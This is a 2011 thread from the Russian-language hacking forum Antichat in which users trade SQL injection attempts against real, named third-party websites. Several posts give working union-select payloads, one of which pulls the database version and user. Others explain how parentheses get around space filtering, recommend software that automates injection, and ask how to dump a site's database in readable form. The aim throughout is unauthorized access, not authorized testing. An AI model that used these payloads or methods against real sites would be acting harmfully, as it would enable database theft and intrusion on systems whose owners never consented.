ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
20.12.2011, 17:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от lightangel
lightangel said:
Is this website vulnerable?
Код:
Code:
http://www.aminfans.com/products.php?p_id=-2
Tried everything still, nothing works. i don't think so
|
|
|
|
20.12.2011, 18:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
Thanks.
Код:
Code:
http://www.barigo.de/shop/front/category_detail.php3?language=l2%27&cat_id=4%27&cat2_id=15%27&item_id=.24%27
Cannot get order by? |
|
|
|
20.12.2011, 19:10
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
2lightangel you yourself are not you ashamed? can all still try to read the manual about sql injections?
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
20.12.2011, 19:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от lightangel
lightangel said:
Thanks.
Код:
Code:
http://www.barigo.de/shop/front/category_detail.php3?language=l2%27&cat_id=4%27&cat2_id=15%27&item_id=.24%27
Cannot get order by? /thread43966.html
|
|
|
|
21.12.2011, 03:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
7749
Репутация:
0
|
|
Напал на след статьи /showthread.php?t=195037
Непонятен вопрос обхода пробелов через магические скобки ))) -
Запросы вида - /script.php?id=(50)union(select(1),database(),2--+) вводят в ступор.
Как это работает,там не объясняется. |
|
|
|
21.12.2011, 07:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
29020
Репутация:
55
|
|
Тут походу используются под запросы, подробней по ссылки ниже.
http://mysql.ru/docs/gruber/mg11.html
|
|
|
|
21.12.2011, 09:27
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
Сообщение от Breetonia
Breetonia said:
Напал на след статьи /showthread.php?t=195037
Непонятен вопрос обхода пробелов через магические скобки ))) -
Запросы вида - /script.php?id=(50)union(select(1),database(),2--+) вводят в ступор.
Как это работает,там не объясняется. Скобки не магические, а круглые http://mysql.ru/docs/man/Parentheses.html
Просто в некоторых случаях, рядом со скобками (как и с некоторыми другими символами, пример && || @) пробел не обязателен.
|
|
|
|
21.12.2011, 14:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
хелп, немогу подобрать количество полей
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//logan.ru/faq.html?id=12'+union+select+1,2,3,4,5,6,7,8,9,10,12,13--+
[/COLOR][/COLOR]
есть ли какойеибуть софт который может ето сделать?? потомучто вручную подбирать срехнутя можно |
|
|
|
21.12.2011, 14:30
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
2qaz,
Код:
Code:
http://logan.ru/faq.html?id=9999+union+select+1,group_concat(0x3a,version(),user(),3,4,5,6,7,8--+
/showpost.php?p=2789336&postcount=15 неплохой софт для автоматического проведения инъекции. |
|
|
|
21.12.2011, 14:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
а вот, ещо вопрос, есть сайт
там вся инфа в таком виде
?????? ???? ????????? ???????????? ? ????? ??????? ??????????? ????????????? ?????? ????????. ????, ????????????? ?? ???? ????? ???
и естественно
из БД при sql-in тоже всё в таком виде, как быть? как в нормальном выде слить базу?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
